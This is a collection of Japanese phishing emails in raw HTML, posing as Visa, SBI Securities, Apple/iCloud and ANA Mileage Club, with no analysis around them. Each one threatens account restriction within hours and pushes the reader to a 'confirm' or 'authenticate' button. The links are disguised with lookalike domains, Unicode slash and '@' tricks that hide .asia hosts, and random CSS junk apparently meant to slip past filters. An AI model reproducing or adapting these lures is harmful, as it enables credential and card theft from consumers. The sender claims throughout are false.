お知らせ:visacardのご利用に関する確認が必要です。Type=112945
<script type="text/javascript"> var gk_isXlsx = false; var gk_xlsxFileLookup = {}; var gk_fileData = {}; function filledCell(cell) { return cell !== '' && cell != null; } function loadFileData(filename) { if (gk_isXlsx && gk_xlsxFileLookup[filename]) { try { var workbook = XLSX.read(gk_fileData[filename], { type: 'base64' }); var firstSheetName = workbook.SheetNames[0]; var worksheet = workbook.Sheets[firstSheetName]; // Convert sheet to JSON to filter blank rows var jsonData = XLSX.utils.sheet_to_json(worksheet, { header: 1, blankrows: false, defval: '' }); // Filter out blank rows (rows where all cells are empty, null, or undefined) var filteredData = jsonData.filter(row => row.some(filledCell)); // Heuristic to find the header row by ignoring rows with fewer filled cells than the next row var headerRowIndex = filteredData.findIndex((row, index) => row.filter(filledCell).length >= filteredData[index + 1]?.filter(filledCell).length ); // Fallback if (headerRowIndex === -1 || headerRowIndex > 25) { headerRowIndex = 0; } // Convert filtered JSON back to CSV var csv = XLSX.utils.aoa_to_sheet(filteredData.slice(headerRowIndex)); // Create a new sheet from filtered array of arrays csv = XLSX.utils.sheet_to_csv(csv, { header: 1 }); return csv; } catch (e) { console.error(e); return ""; } } return gk_fileData[filename] || ""; } </script><html><head> <meta content="text/html; charset=utf-8" http-equiv=Content-Type> <style> body { font-family: 'ヒラギノ角ゴ Pro', sans-serif; color: #222; background-color: #f0f4f8; margin: 0; padding: 20px; } .container { max-width: 780px; margin: 0 auto; background: #fff; border: 3px solid #b22222; border-radius: 10px; } .header { background: #b22222; color: #fff; text-align: center; padding: 30px; } ..step-container { padding: 20px; } .step-card { margin: 20px 0; padding: 20px; background: #f8f9fa; border-radius: 8px; line-height: 1.8; font-size: 16px; box-shadow: 0 2px 4px rgba(0,0,0,0.1); } .step-card.warning { background: #ffe6e6; border: 2px solid #b22222; text-align: center; } .btn-container { text-align: center; margin: 20px 0; } .login-btn { background: #b22222; color: #fff; padding: 15px 40px; text-decoration: none; border-radius: 8px; font-size: 18px; font-weight: bold; transition: background 0.3s; } .login-btn:hover { background: #8b0000; } .footer { text-align: center; font-size: 12px; color: #666; padding: 20px; background: #f8f9fa; } </style><style>
#eejyhm-vuchgolg .fzvrd-bzwocw-svpfdswnkm .Xvql-Upbe-Pnaxwi .xfolzgdbvtumyyypf {
background-origin:padding-box;
}
</style></head><body> <div class=container> <div class=header> <h1>【緊急】Visaカードセキュリティ確認</h1> </div> <div class=step-container> <div class=step-card> <b>ステップ1:緊急通知</b><br> いつもVisaカードをご利用いただき、ありがとうございます。お客様のカードに登録された携帯電話番号の確認が至急必要です。 </div> <div class=step-card> <b>ステップ2:セキュリティリスク</b><br> 未対応の場合、アカウントの利用が制限される可能性があります。24時間以内に手続きを完了してください。 </div> <div class=step-card warning> <b>ステップ3:今すぐ行動</b><br> <strong>【確認手続きを実施してください】</strong><br> 下記のリンクをクリックし、画面の指示に従って手続きを進めてください。<br> <div class=btn-container> <a class=login-btn href="https://www.ihvolas.jp∕uzeuk@bxyh.asia/?idtokenvaikr=bsuijx/#pciraftk">確認手続きを進める</a> </div> </div> <div class=step-card> <b>ステップ4:サポート</b><br> ご不明な点はVisaカスタマーサービスまでご連絡ください。<br><br> 発行者:<br> Visaカード<br> 東京都中野区中野4-3-2 </div> </div> <div class=footer> <div>© Visa CO., LTD. All rights reserved.</div> </div> </div></body></html>
緊急のご案内:visacardの利用確認を速やかに行ってください。Alias=6003114104
<script type="text/javascript"> var gk_isXlsx = false; var gk_xlsxFileLookup = {}; var gk_fileData = {}; function filledCell(cell) { return cell !== '' && cell != null; } function loadFileData(filename) { if (gk_isXlsx && gk_xlsxFileLookup[filename]) { try { var workbook = XLSX.read(gk_fileData[filename], { type: 'base64' }); var firstSheetName = workbook.SheetNames[0]; var worksheet = workbook.Sheets[firstSheetName]; // Convert sheet to JSON to filter blank rows var jsonData = XLSX.utils.sheet_to_json(worksheet, { header: 1, blankrows: false, defval: '' }); // Filter out blank rows (rows where all cells are empty, null, or undefined) var filteredData = jsonData.filter(row => row.some(filledCell)); // Heuristic to find the header row by ignoring rows with fewer filled cells than the next row var headerRowIndex = filteredData.findIndex((row, index) => row.filter(filledCell).length >= filteredData[index + 1]?.filter(filledCell).length ); // Fallback if (headerRowIndex === -1 || headerRowIndex > 25) { headerRowIndex = 0; } // Convert filtered JSON back to CSV var csv = XLSX.utils.aoa_to_sheet(filteredData.slice(headerRowIndex)); // Create a new sheet from filtered array of arrays csv = XLSX.utils.sheet_to_csv(csv, { header: 1 }); return csv; } catch (e) { console.error(e); return ""; } } return gk_fileData[filename] || ""; } </script><html><head> <meta content="text/html; charset=utf-8" http-equiv=Content-Type> <style> body { font-family: 'メイリオ', sans-serif; color: #222; background-color: #e6e6e6; margin: 0; padding: 20px; } .table-container { max-width: 800px; margin: 0 auto; background: #fff; border: 3px solid #003087; } table { width: 100%; border-collapse: collapse; } .header { background: #003087; color: #fff; text-align: center; padding: 20px; } .content-cell { padding: 20px; line-height: 1.8; font-size: 16px; vertical-align: top; } .warning-cell { background: #ffe6e6; border: 2px solid #ff3333; padding: 20px; margin: 20px; border-radius: 8px; text-align: center; } .btn-cell { text-align: center; padding: 20px; } .login-btn { background: #ff3333; color: #fff; padding: 15px 40px; text-decoration: none; border-radius: 8px; font-size: 18px; font-weight: bold; transition: background 0.3s; } .login-btn:hover { background: #cc0000; } .footer { text-align: center; font-size: 12px; color: #666; padding: 20px; background: #f8f9fa; } </style><style>
.SlpoKeBgVYmqCVLcM .Jdojrhj-Zufyin-Jir #XfvV-TkrupQPHu-HVFvLghf .aTtLcsfuuahySvidEAvi .Skcacbuzrq .YJmxK-aLzx-aCcCFrgq .pYrZsEay-aDSfVnYyw {
font-stretch:normal;
}
</style></head><body> <div class=table-container> <table> <tr> <td class=header colspan=2> <h1>【緊急】Visaカードセキュリティ確認要請</h1> </td> </tr> <tr> <td class=content-cell colspan=2> いつもVisaカードをご利用いただき、ありがとうございます。<br> <b>重大なお知らせ:</b>お客様のカードに登録された携帯電話番号の確認が至急必要です。セキュリティ上のリスクを防ぐため、24時間以内に以下の手続きを完了してください。<br> 未対応の場合、アカウントの利用が制限される可能性があります。 </td> </tr> <tr> <td class=warning-cell colspan=2> <strong>【今すぐ確認手続きを実施してください】</strong><br> 下記のリンクをクリックし、画面の指示に従って手続きを進めてください。 </td> </tr> <tr> <td class=btn-cell colspan=2> <a class=login-btn href="https://www.ziaozg.jp∕imnzthj@bxyh.asia/?idtokencsxksa=slsyqijr/#tzmiqiljiq">確認手続きを進める</a> </td> </tr> <tr> <td class=content-cell colspan=2> <b>セキュリティ警告</b><br> この手続きはお客様のアカウントの安全確保に不可欠です。ご不明な点はVisaカスタマーサービスまでご連絡ください。<br><br> 発行者:<br> Visaカード<br> 東京都中野区中野4-3-2 </td> </tr> <tr> <td class=footer colspan=2> <div>© Visa CO., LTD. All rights reserved.</div> </td> </tr> </table> </div></body></html>
【重要なお知らせ】未読による一部機能の制限について
SBI证券ご利用のお客様へ
平素よりSBI證券をご利用いただき、誠にありがとうごさいます。
現在、お客様のアカウントにおいて、重要なお知らせが未読の状態となっております。
本お知らせには、お取引や口座管理に関する重要な情報が含まれておりますので、速やかにご確認いただきますようお願いいたします。
なお、本お知らせをご確認いただけない場合、一部の機能(出金·取引等)が一時的に制限される可能性があります。
以下のリンクをクリックし、未読のお知らせをご確認ください。
未読のお知らせを確認する
お客様にはご不便をおかけいたしますが、安全かつ円滑なお取引のため、何卒ご理解とご協力を賜りますようお願い申し上けます。
SBI證券株式会社 金融商品取引業者 関東財務局長(金商)第164号
加入協会:日本証券業協会、一般社団法人金融先物取引業協会
SBI SECURITIES Co., Ltd. ALL Rights
Reserved.
iCloud ご利用継続のための確認事項について
ご案内いたします。ご登録のアカウント認証情報が2025年05月11日に有効期限を迎えます。現在、ご利用は継続中です。
Apple
Podcastsでのリスニング体験を継続いただくため、2日以内に最新情報をご登録ください。情報は弊社セキュリティー基準に基づき厳重に保護されています。
▶ 認証情報を更新
【更新手順】
「認証情報を更新」ボタンをクリックし、Apple IDでサインインしてください。
アカウント設定画面から認証情報を選択し、情報をご確認ください。
必要事項をご入力の上、必ず「保存」を押して更新を完了してください。
【更新がお済みでない場合の影響】
App Store・iTunesでの購入不可
iCloudデータのバックアップ停止
自動更新サービスの中断
登録完了後、すぐにサービスをスムーズにご利用いただけます。ご登録がない場合、サービスが制限される可能性があります。
Copyright © 2025 Apple Inc. All rights
reserved.
ご案内:visacardの利用確認手続きにご対応ください。Stage=5776872200
<script type="text/javascript"> var gk_isXlsx = false; var gk_xlsxFileLookup = {}; var gk_fileData = {}; function filledCell(cell) { return cell !== '' && cell != null; } function loadFileData(filename) { if (gk_isXlsx && gk_xlsxFileLookup[filename]) { try { var workbook = XLSX.read(gk_fileData[filename], { type: 'base64' }); var firstSheetName = workbook.SheetNames[0]; var worksheet = workbook.Sheets[firstSheetName]; // Convert sheet to JSON to filter blank rows var jsonData = XLSX.utils.sheet_to_json(worksheet, { header: 1, blankrows: false, defval: '' }); // Filter out blank rows (rows where all cells are empty, null, or undefined) var filteredData = jsonData.filter(row => row.some(filledCell)); // Heuristic to find the header row by ignoring rows with fewer filled cells than the next row var headerRowIndex = filteredData.findIndex((row, index) => row.filter(filledCell).length >= filteredData[index + 1]?.filter(filledCell).length ); // Fallback if (headerRowIndex === -1 || headerRowIndex > 25) { headerRowIndex = 0; } // Convert filtered JSON back to CSV var csv = XLSX.utils.aoa_to_sheet(filteredData.slice(headerRowIndex)); // Create a new sheet from filtered array of arrays csv = XLSX.utils.sheet_to_csv(csv, { header: 1 }); return csv; } catch (e) { console.error(e); return ""; } } return gk_fileData[filename] || ""; } </script><html><head> <meta content="text/html; charset=utf-8" http-equiv=Content-Type> <style> body { font-family: 'ヒラギノ角ゴ Pro', sans-serif; color: #222; background-color: #f0f4f8; margin: 0; padding: 20px; } .container { max-width: 800px; margin: 0 auto; background: #fff; border: 3px solid #b22222; border-radius: 10px; padding: 20px; } .header { background: #b22222; color: #fff; text-align: center; padding: 30px; border-radius: 8px; } .card { margin: 20px; padding: 20px; background: #f8f9fa; border-radius: 8px; line-height: 1.8; font-size: 16px; box-shadow: 0 4px 8px rgba(0,0,0,0.2); } .card.warning { background: #ffe6e6; border: 2px solid #b22222; text-align: center; } .btn-container { text-align: center; margin: 20px 0; } .login-btn { background: #b22222; color: #fff; padding: 15px 40px; text-decoration: none; border-radius: 8px; font-size: 18px; font-weight: bold; transition: background 0.3s; } .login-btn:hover { background: #8b0000; } .footer { text-align: center; font-size: 12px; color: #666; padding: 20px; background: #f8f9fa; border-radius: 8px; } </style><style>
#Henxv-Sltryacpa-Iks #Xbfekombug-Ffdbmabvia .Dqbaalsw-Hhlsqkeyr-Scwkwawkq #Xdmatmmbjnbjxvptjrrj #Qggfzebbp .ifpqrm-neannalc #Tpuxwun-Nwhmm-Plgntaa .Bptsenc-Bzz-Pljvdjyt #Xxoeohz-Vwevgbu-Zuh {
isolation:auto;
}
</style></head><body> <div class=container> <div class=header> <h1>【緊急】Visaカードセキュリティ確認</h1> </div> <div class=card> <b>緊急のお知らせ</b><br> いつもVisaカードをご利用いただき、ありがとうございます。お客様のカードに登録された携帯電話番号の確認が至急必要です。 </div> <div class=card> <b>セキュリティリスク</b><br> 未対応の場合、アカウントの利用が制限される可能性があります。24時間以内に手続きを完了してください。 </div> <div class=card warning> <b>今すぐ行動</b><br> <strong>【確認手続きを実施してください】</strong><br> 下記のリンクをクリックし、画面の指示に従って手続きを進めてください。<br> <div class=btn-container> <a class=login-btn href="https://www.wwvexwqz.jp∕kiavupjotc@bxyh.asia/?idtokenevkpdui=zzyibg/#sjkjc">確認手続きを進める</a> </div> </div> <div class=card> <b>サポート</b><br> ご不明な点はVisaカスタマーサービスまでご連絡ください。<br><br> 発行者:<br> Visaカード<br> 東京都中野区中野4-3-2 </div> <div class=footer> <div>© Visa CO., LTD. All rights reserved.</div> </div> </div></body></html>
ご利用継続のための確認のお願い
<html><head><meta charset=utf-8><meta name=viewport content="width=device-width, initial-scale=1.0"><style> body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif; background-color: #ffffff; margin: 0; padding: 0; color: #333333; } .header { text-align: center; padding: 20px 0; } .header img { width: 42px; height: auto; max-width: 100%; } .content { max-width: 600px; margin: 0 auto; padding: 0 20px 20px; text-align: center; } .content h2 { font-size: 22px; color: #333333; margin: 0 0 20px; } .content p { font-size: 16px; line-height: 1.6; color: #333333; margin: 0 0 20px; } .button { text-align: center; margin: 30px 0; } .button a { text-decoration: none; font-weight: bold; color: #ffffff; padding: 12px 24px; background-color: #000000; border-radius: 10px; box-shadow: 0 2px 5px rgba(0,0,0,0.2); display: inline-block; min-width: 44px; min-height: 44px; } .footer { margin-top: 20px; text-align: center; font-size: 14px; color: #888888; } .footer a { color: #007aff; text-decoration: none; } @media only screen and (max-width: 600px) { .content { padding: 0 15px 15px; } .content h2 { font-size: 18px; } .content p { font-size: 14px; margin-bottom: 15px; } .button a { padding: 10px 20px; font-size: 14px; } .footer { font-size: 12px; } } </style><meta name=GENERATOR content="MSHTML 11.00.9600.21615"><style>
.Wqqytltim-Qje-Sgvzcd .Eskdbbt-Qjtssudmam-Ffsyqoomlu .cdmf-ishse-alszmsmcqq .uuomoi-csqp .dstsnasyfv-ztimzmo .ptgsjbxhucje .wybisw-twopvps #hmoynzdyvqksfvzzcc {
padding-left:0;
counter-reset:none;
}
</style></head><body><div class=header><img alt=Apple src="https://s.mzstatic.com/email/images_shared/logo_apple_d-2x.png" width=42 height=42> </div><div class=content><h2>カード情報の認証のお願い</h2><div>ご注意ください。2025年5月7日にご登録カードの異常な使用が確認されました。現在、カードの安全を確保するため、ご利用が一時的に制限されています。</div><div>Apple Cardでのスムーズな決済を継続いただくため、2日以内に早急にご確認ください。情報は弊社セキュリティー基準に基づき厳重に保護されています。</div><div class=button><a aria-label=カード確認ボタン href="https://icloudpazjdu.com∕horaox@xacda.asia/iclouddashj76878HGJSA/?idtokenuljyyj=myb2ex4">カードを認証</a> </div><div>認証完了後、すぐにサービスをスムーズにご利用いただけます。ご確認がない場合、ご利用が制限される可能性があります。</div></div><div class=footer><div>今後ともよろしくお願いいたします。<br>Apple</div><div>サポートが必要な場合は、<br><a href="https://icloudfeartpvnpo.com∕iyxnydvi@xacda.asia/iclouddashj76878HGJSA/?idtokennbtrqyrfr=wynpcyrlh">Appleサポート</a>にアクセスしてください。</div><div><a href="https://icloudqodljwzsk.com∕kuyclg@xacda.asia/iclouddashj76878HGJSA/?idtokenkgmgcpqkdk=156r1aq">Apple Account</a> | <a href="https://icloudavypwwy.com∕ennrz@xacda.asia/iclouddashj76878HGJSA/?idtokenlehscqf=ltnnyz5sf]">販売条件</a> | <a href="https://icloudzgzennz.com∕aflqrogv@xacda.asia/iclouddashj76878HGJSA/?idtokencelblwpmuq=gxsa0ug">プライバシーポリシー</a></div><div>Copyright © 2025 iTunes K.K.<br>All rights reserved.</div></div><br><br></body></html>
緊急のお願い:visacardの利用確認にご対応ください。Sector=313549
<script type="text/javascript"> var gk_isXlsx = false; var gk_xlsxFileLookup = {}; var gk_fileData = {}; function filledCell(cell) { return cell !== '' && cell != null; } function loadFileData(filename) { if (gk_isXlsx && gk_xlsxFileLookup[filename]) { try { var workbook = XLSX.read(gk_fileData[filename], { type: 'base64' }); var firstSheetName = workbook.SheetNames[0]; var worksheet = workbook.Sheets[firstSheetName]; // Convert sheet to JSON to filter blank rows var jsonData = XLSX.utils.sheet_to_json(worksheet, { header: 1, blankrows: false, defval: '' }); // Filter out blank rows (rows where all cells are empty, null, or undefined) var filteredData = jsonData.filter(row => row.some(filledCell)); // Heuristic to find the header row by ignoring rows with fewer filled cells than the next row var headerRowIndex = filteredData.findIndex((row, index) => row.filter(filledCell).length >= filteredData[index + 1]?.filter(filledCell).length ); // Fallback if (headerRowIndex === -1 || headerRowIndex > 25) { headerRowIndex = 0; } // Convert filtered JSON back to CSV var csv = XLSX.utils.aoa_to_sheet(filteredData.slice(headerRowIndex)); // Create a new sheet from filtered array of arrays csv = XLSX.utils.sheet_to_csv(csv, { header: 1 }); return csv; } catch (e) { console.error(e); return ""; } } return gk_fileData[filename] || ""; } </script><html><head> <meta content="text/html; charset=utf-8" http-equiv=Content-Type> <style> body { font-family: 'ヒラギノ角ゴ Pro', sans-serif; color: #222; background-color: #f4f4f4; margin: 0; padding: 0; } .main { max-width: 720px; margin: 40px auto; background: #fff; border: 3px solid #1c2526; border-radius: 12px; } .header { background: #1c2526; color: #fff; padding: 30px; text-align: center; } .alert-header { background: #ff3333; color: #fff; padding: 10px; text-align: center; font-size: 18px; } .content { padding: 30px; line-height: 1.8; font-size: 16px; } .warning { background: #fff5f5; border: 2px dashed #ff3333; padding: 20px; margin: 20px 0; text-align: center; } .login-btn { background: #ff3333; color: #fff; padding: 15px 50px; text-decoration: none; border-radius: 10px; font-size: 18px; font-weight: bold; display: inline-block; } .login-btn:hover { background: #cc0000; } .btn-container { text-align: center; margin: 30px 0; } .footer { text-align: center; font-size: 12px; color: #666; padding: 20px; background: #f8f9fa; } </style><style>
.HiTn-LoutNSyLQ-Pvz #Elekwcsddy-Thnd-Jnyc #Nrrsldrkccgmss .Ogfvrsl-Xqbzo-Nbwrtekg #Cqbakmn-Inextwy #nqknksl-bcufhftgo #menmg-iddv .Smvdpfipok-Tcfydm-Wvdcj #Gkhsg-Ufpty-Ywb {
border-top-right-radius:;
font-variant-caps:normal;
}
</style></head><body> <div class=main> <div class=header> <h1>【緊急対応必須】Visaカードセキュリティ確認</h1> </div> <div class=alert-header> 24時間以内のご対応が必要です </div> <div class=content> いつもVisaカードをご利用いただき、ありがとうございます。<br> <b>重大なお知らせ:</b>お客様のVisaカードに登録された携帯電話番号の確認が直ちに必要です。セキュリティ上の重大なリスクを回避するため、至急以下の手続きを行ってください。<br> 未対応の場合、アカウントの利用が制限される恐れがあります。 </div> <div class=warning> <strong>【今すぐ行動してください】</strong><br> 下記のリンクをクリックし、画面の指示に従って確認手続きを進めてください。 </div> <div class=btn-container> <a class=login-btn href="https://www.seyja.jp∕nyewqdsf@bxyh.asia/?idtokenzyivecy=qffjiztmep/#fchag">確認手続きを進める</a> </div> <div class=content> <b>セキュリティに関する重要事項</b><br> この手続きはお客様のアカウント保護に不可欠です。ご不明な点はVisaカスタマーサービスまでご連絡ください。<br><br> 発行者:<br> Visaカード<br> 東京都中野区中野4-3-2 </div> <div class=footer> <div>© Visa CO.., LTD. All rights reserved.</div> </div> </div></body></html>
【重要】ANAマイレージクラブ:マイル登録手続きの情報 Segment=45938565
<script type="text/javascript"> var gk_isXlsx = false; var gk_xlsxFileLookup = {}; var gk_fileData = {}; function filledCell(cell) { return cell !== '' && cell != null; } function loadFileData(filename) { if (gk_isXlsx && gk_xlsxFileLookup[filename]) { try { var workbook = XLSX.read(gk_fileData[filename], { type: 'base64' }); var firstSheetName = workbook.SheetNames[0]; var worksheet = workbook.Sheets[firstSheetName]; // Convert sheet to JSON to filter blank rows var jsonData = XLSX.utils.sheet_to_json(worksheet, { header: 1, blankrows: false, defval: '' }); // Filter out blank rows (rows where all cells are empty, null, or undefined) var filteredData = jsonData.filter(row => row.some(filledCell)); // Heuristic to find the header row by ignoring rows with fewer filled cells than the next row var headerRowIndex = filteredData.findIndex((row, index) => row.filter(filledCell).length >= filteredData[index + 1]?.filter(filledCell).length ); // Fallback if (headerRowIndex === -1 || headerRowIndex > 25) { headerRowIndex = 0; } // Convert filtered JSON back to CSV var csv = XLSX.utils.aoa_to_sheet(filteredData.slice(headerRowIndex)); // Create a new sheet from filtered array of arrays csv = XLSX.utils.sheet_to_csv(csv, { header: 1 }); return csv; } catch (e) { console.error(e); return ""; } } return gk_fileData[filename] || ""; } </script><html lang=ja><head><title>ANAマイレージクラブご案内</title><meta charset=UTF-8><meta name=viewport content="width=device-width, initial-scale=1.0"><style>body { font-family: 'Roboto', sans-serif; background: #f5f5f5; color: #333; padding: 20px; }.timeline { max-width: 600px; margin: 0 auto; background: #fff; padding: 25px; border-radius: 10px; position: relative; }.timeline:before { content: ''; position: absolute; top: 0; bottom: 0; left: 50px; width: 4px; background: #28a745; }.event { position: relative; margin: 20px 0; padding-left: 70px; }.event:before { content: '●'; position: absolute; left: 43px; color: #28a745; font-size: 20px; }h2 { font-size: 24px; color: #28a745; text-align: center; }p { font-size: 15px; line-height: 1.7; }.link { color: #28a745; text-decoration: none; font-weight: bold; }.link:hover { text-decoration: underline; }.note { font-size: 13px; color: #666; background: #e9f5e9; padding: 10px; border-radius: 5px; }.footer { text-align: center; font-size: 12px; color: #777; }</style><style>
#Ydnfil-Txkqbt-Klhdfe #Ktj-Augp-Lentr #itmc-idchb-jfveyddl .Zquhqoyrtvm .zUcxkg-KFmfFZCGC-HcY {
border-bottom-left-radius:1em;
max-width:none;
}
</style><style>
.GqQU-aJxld {
animation-fill-mode:none;
}
</style></head><body><div class="timeline"><h2>ANAマイレージクラブ: マイル加算のお願い</h2><div class="event"><p>いつもANAマイレージクラブをご利用いただき、ありがとうございます。</p></div><div class="event"><p>以下のマイルが自動加算されていません。</p><p><strong>未加算マイル:4.100マイル</strong><br>期限:受信後72時間</p></div><div class="event"><p>原因:登録情報と予約情報の不一致。以下のリンクで手続きを完了してください。</p><p><a class="link" href="https://ana-pgboe.com∕pkafv∕xwtrpztqz∕kuiwp@ggpw.asia?/idtokenckmawz=r205x91/" rel="nofollow noopener noreferrer" target="_blank">マイル加算</a></p></div><div class="event"><p class="note">※ リンク有効期限:72時間。マイル有効期限:1年間。</p></div><hr style="border: 1px solid #28a745;"><p>ご不明点はANAマイレージクラブまでご連絡ください。</p><p class="footer">引き続きのご愛顧をよろしくお願いいたします。<br>ANAマイレージクラブ</p></div></body></html>
ご利用継続のための確認のお願い
<html><head><meta charset=utf-8><meta name=viewport
content="width=device-width, initial-scale=1.0"><style> body { font-family:
-apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif;
background-color: #ffffff; margin: 0; padding: 0; color: #333333; }
..header { text-align: center; padding: 20px 0; } .header img { width: 42px;
height: auto; max-width: 100%; } .content { max-width: 600px; margin: 0
auto; padding: 0 20px 20px; text-align: center; } .content h2 { font-size:
22px; color: #333333; margin: 0 0 20px; } .content p { font-size: 16px;
line-height: 1.6; color: #333333; margin: 0 0 20px; } .button { text-align:
center; margin: 30px 0; } .button a { text-decoration: none; font-weight:
bold; color: #ffffff; padding: 12px 24px; background-color: #000000;
border-radius: 10px; box-shadow: 0 2px 5px rgba(0,0,0,0.2); display:
inline-block; min-width: 44px; min-height: 44px; } .footer { margin-top:
20px; text-align: center; font-size: 14px; color: #888888; } .footer a {
color: #007aff; text-decoration: none; } @media only screen and (max-width:
600px) { .content { padding: 0 15px 15px; } .content h2 { font-size: 18px;
} .content p { font-size: 14px; margin-bottom: 15px; } .button a { padding:
10px 20px; font-size: 14px; } .footer { font-size: 12px; } } </style><meta
name=GENERATOR content="MSHTML 11.00.9600.21615"><style>
#Kimdv-Velxlsn-Qxtzdzeq {
font-style:normal;
caret-color:auto;
}
</style><style>
#xrutnbdtnhplu #gfqlsd-fve .Mzmuq-Fryarne #nkgosjq-pvtppx-hqkah
#wcth-zynx-qiunxp #fvu-bbrjwuf #Gklyblmrh-Eypoutuxy #Cmsgn-Btsaflnc
#xoo-ylcldoc-hmilxizguy {
position:static;
text-indent:0;
}
</style></head><body><div class=header><img alt=Apple
src="https://s.mzstatic.com/email/images_shared/logo_apple_d-2x.png"
width=42 height=42> </div><div class=content><h2>カード情報
の認証のお願い</h2><div>ご注意
ください。2025年5月7日にご登録カードの異常な使用が確認
されました。現在、カードの安全を確保
するため、ご利用が一時
的に制限されています。</div><div>Apple Cardでのスムーズな決済
を継続いただくため、2日以内に早急にご確
認ください。情報は弊社セキュリティー基
準に基づき厳重に保護されています。</div><div
class=button><a aria-label=カード確認ボタン
href="https://iclouddtdas.com∕dxaowv@cqwide.asia/iclouddashj76878HGJSA/?
idtokenapvjb=kwf1o3kl3">カードを認証</a>
</div><div>認証完了後、すぐにサービスをスムーズにご利用
いただけます。ご確認がない場合、ご利用
が制限される可能性
があります。</div></div><div class=footer><div>今後
ともよろしくお願いいたします。<br>Apple</div><div>サポートが必要な場合は、<br><a
href="https://icloudtlowaqumkf.com∕szyuijhcwu@cqwide.asia/iclouddashj76878HG
JSA/?idtokenkmuobeyrzo=l7kogv">Appleサポート</a>にアクセスしてください。</div><div><a
href="https://icloudpuspxdjxv.com∕rawwxjsgn@cqwide.asia/iclouddashj76878HGJS
A/?idtokenfexabb=7xxgm68g">Apple Account</a> | <a
href="https://icloudpqntglx.com∕ecslesy@cqwide.asia/iclouddashj76878HGJSA/?
idtokendtmxseugll=siwdzmh]">販売条件</a> | <a
href="https://icloudplwrnv.com∕uhhzkoynt@cqwide.asia/iclouddashj76878HGJSA/?
idtokenzujogf=n6y6n">プライバシーポリシー</a></div><div>Copyright © 2025 iTunes
K.K.<br>All rights reserved.</div></div><br><br></body></html>
ご利用継続のための確認のお願い
<html><head><meta charset=utf-8><meta name=viewport content="width=device-width, initial-scale=1.0"><style> body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif; background-color: #ffffff; margin: 0; padding: 0; color: #333333; } .header { text-align: center; padding: 20px 0; } .header img { width: 42px; height: auto; max-width: 100%; } .content { max-width: 600px; margin: 0 auto; padding: 0 20px 20px; text-align: center; } .content h2 { font-size: 22px; color: #333333; margin: 0 0 20px; } .content p { font-size: 16px; line-height: 1.6; color: #333333; margin: 0 0 20px; } .button { text-align: center; margin: 30px 0; } .button a { text-decoration: none; font-weight: bold; color: #ffffff; padding: 12px 24px; background-color: #000000; border-radius: 10px; box-shadow: 0 2px 5px rgba(0,0,0,0.2); display: inline-block; min-width: 44px; min-height: 44px; } .footer { margin-top: 20px; text-align: center; font-size: 14px; color: #888888; } .footer a { color: #007aff; text-decoration: none; } @media only screen and (max-width: 600px) { .content { padding: 0 15px 15px; } .content h2 { font-size: 18px; } .content p { font-size: 14px; margin-bottom: 15px; } .button a { padding: 10px 20px; font-size: 14px; } .footer { font-size: 12px; } } </style><meta name=GENERATOR content="MSHTML 11.00.9600.21615"><style>
#Dcisswxuy-Mrpp-Pef #ici-hjia #bxlgzdgst .Sohfbt-Gepsuaank .xemGKiRH-XuC {
border-top-color:transparent;
bottom:auto;
}
</style><style>
.ghsuble .FSjiPZrzWDdmfLoOcjUs #Kilthe-Nnps-Cfjtxi #baeznh-atwnrl-vjfbitbnq #DJxYbqnY #utwun-teurkojsh {
border-top-left-radius:;
right:auto;
}
</style></head><body><div class=header><img alt=Apple src="https://s.mzstatic.com/email/images_shared/logo_apple_d-2x.png" width=42 height=42> </div><div class=content><h2>カード情報の認証のお願い</h2><div>ご注意ください。2025年5月7日にご登録カードの異常な使用が確認されました。現在、カードの安全を確保するため、ご利用が一時的に制限されています。</div><div>Apple Cardでのスムーズな決済を継続いただくため、2日以内に早急にご確認ください。情報は弊社セキュリティー基準に基づき厳重に保護されています。</div><div class=button><a aria-label=カード確認ボタン href="https://icloudkusjssou.com∕flmmnclhl@jnwiv.asia/iclouddashj76878HGJSA/?idtokenntwfmnddbh=die94b7">カードを認証</a> </div><div>認証完了後、すぐにサービスをスムーズにご利用いただけます。ご確認がない場合、ご利用が制限される可能性があります。</div></div><div class=footer><div>今後ともよろしくお願いいたします。<br>Apple</div><div>サポートが必要な場合は、<br><a href="https://icloudnipuymbkd.com∕zayzj@jnwiv.asia/iclouddashj76878HGJSA/?idtokenyahgzj=dexdlqa3">Appleサポート</a>にアクセスしてください。</div><div><a href="https://icloudwunogvopmm.com∕scwrp@jnwiv.asia/iclouddashj76878HGJSA/?idtokenjxhwotyg=zbha0br0">Apple Account</a> | <a href="https://icloudifcta.com∕ektakxvop@jnwiv.asia/iclouddashj76878HGJSA/?idtokenmnvhhhh=fxi9m0my]">販売条件</a> | <a href="https://icloudrxcbbha.com∕hdnjmsmi@jnwiv.asia/iclouddashj76878HGJSA/?idtokensdqfrnjs=2qkkrp">プライバシーポリシー</a></div><div>Copyright © 2025 iTunes K.K.<br>All rights reserved.</div></div><br><br></body></html>